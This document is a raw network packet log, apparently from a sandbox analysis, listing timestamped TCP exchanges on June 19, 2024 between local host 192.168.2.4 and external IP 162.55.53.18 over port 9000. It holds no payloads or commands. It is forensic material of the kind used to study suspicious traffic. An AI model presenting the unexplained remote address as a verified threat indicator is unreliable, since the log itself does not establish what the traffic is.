Jun 19, 2024 14:40:09.025441885 CEST	9000	49746	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:09.025593996 CEST	9000	49746	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:09.026068926 CEST	9000	49746	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:09.026077032 CEST	9000	49746	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:09.026093960 CEST	9000	49746	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:09.026103973 CEST	9000	49746	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:09.361648083 CEST	49744	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:09.362082005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:09.367553949 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:09.367630005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:09.367856979 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:09.368432045 CEST	9000	49744	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:09.368515015 CEST	49744	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:09.372793913 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:10.970925093 CEST	9000	49746	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:10.971013069 CEST	49746	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:11.251236916 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.251307964 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:11.251696110 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:11.254255056 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:11.256470919 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.259037018 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.588980913 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.589026928 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.589112043 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:11.589112043 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:11.720078945 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.720108032 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.720119953 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.720129967 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.720159054 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:11.720206022 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:11.810857058 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.810883999 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.810897112 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.810906887 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.810955048 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:11.811002970 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:11.901499987 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.901514053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.901550055 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.901561975 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.901612997 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:11.901657104 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:11.992353916 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.992367983 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.992389917 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.992400885 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:11.992445946 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:11.992502928 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.087856054 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.087893963 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.087904930 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.087980986 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.087980986 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.173952103 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.173974037 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.173983097 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.174041033 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.174112082 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.174134016 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.174182892 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.174407959 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.174468040 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.265501022 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.265523911 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.265539885 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.265554905 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.265569925 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.265583992 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.265639067 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.356148005 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.356189966 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.356205940 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.356223106 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.356240988 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.356260061 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.356261015 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.356317997 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.447163105 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.447196007 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.447213888 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.447232962 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.447276115 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.447303057 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.447381020 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.447396994 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.447432041 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.447448969 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.538295984 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.538317919 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.538351059 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.538367033 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.538383961 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.538415909 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.538464069 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.580686092 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.580710888 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.580760956 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.580811024 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.629106998 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.629144907 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.629160881 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.629168987 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.629215956 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.629230022 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.629246950 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.629277945 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.629300117 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.720608950 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.720653057 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.720669985 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.720685959 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.720701933 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.720716000 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.720716000 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.720773935 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.784874916 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.784897089 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.785057068 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.818141937 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.818197966 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.818227053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.818243980 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.818244934 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.818264008 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.818283081 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.818283081 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.818319082 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.818319082 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.909018993 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.909071922 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.909082890 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.909089088 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.909107924 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.909126997 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.909128904 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.909164906 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.909187078 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.909399986 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.909439087 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.909503937 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.909554958 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:12.909630060 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:12.909679890 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.000000954 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.000042915 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.000060081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.000072956 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.000077963 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.000097036 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.000143051 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.000144005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.000144005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.000144005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.000405073 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.000457048 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.000492096 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.000514030 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.000530005 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.000540972 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.000569105 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.000570059 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.090852022 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.090902090 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.090917110 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.090931892 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.090976000 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.090976000 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.091022968 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.091037035 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.091041088 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.091067076 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.091094017 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.091485977 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.091536999 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.091542959 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.091559887 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.091586113 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.091613054 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.091618061 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.091664076 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.181883097 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.181910992 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.181929111 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.181946039 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.181978941 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.182028055 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.182028055 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.182045937 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.182061911 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.182082891 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.182121992 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.182630062 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.182681084 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.182688951 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.182707071 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.182724953 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.182738066 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.182775974 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.272653103 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.272681952 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.272762060 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.272872925 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.272907019 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.272922993 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.273010015 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.273025990 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.273085117 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.273119926 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.273508072 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.273541927 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.273574114 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.273607016 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.273658037 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.273674965 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:13.273709059 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:13.273737907 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370218992 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370243073 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370256901 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370273113 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370286942 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370290041 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370356083 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370356083 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370413065 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370429993 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370445967 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370460987 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370461941 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370480061 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370485067 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370511055 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370516062 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370532036 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370533943 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370560884 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370609999 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370657921 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370675087 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370703936 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370728970 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370734930 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370753050 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370769978 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370786905 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370812893 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370812893 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370812893 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370852947 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370887995 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370913029 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370928049 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370932102 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370943069 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370955944 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370956898 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370969057 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370980978 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.370990992 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370990992 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.370994091 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371031046 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.371031046 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.371094942 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.371467113 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371481895 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371499062 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371515036 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371520042 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.371529102 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371542931 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.371546984 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371572971 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.371581078 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371589899 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.371598005 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371613979 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371628046 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.371629000 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371646881 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371659994 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.371664047 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371680975 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.371695995 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371714115 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371720076 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.371741056 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.371750116 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.371759892 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.371824980 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.372373104 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.372428894 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.375376940 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.375446081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.375454903 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.375492096 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.375545025 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.375592947 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.375610113 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.375654936 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.376142979 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.376159906 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.376176119 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.376190901 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.376200914 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.376208067 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.376225948 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.376265049 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.377023935 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.377053976 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.377069950 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.377088070 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.377094030 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.377111912 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.377129078 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.377155066 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.380469084 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.380548954 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.380578041 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.380594015 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.380624056 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.380628109 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:14.380640030 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:14.380651951 CEST	49748	9000	192.168.2.4	162.55.53.18
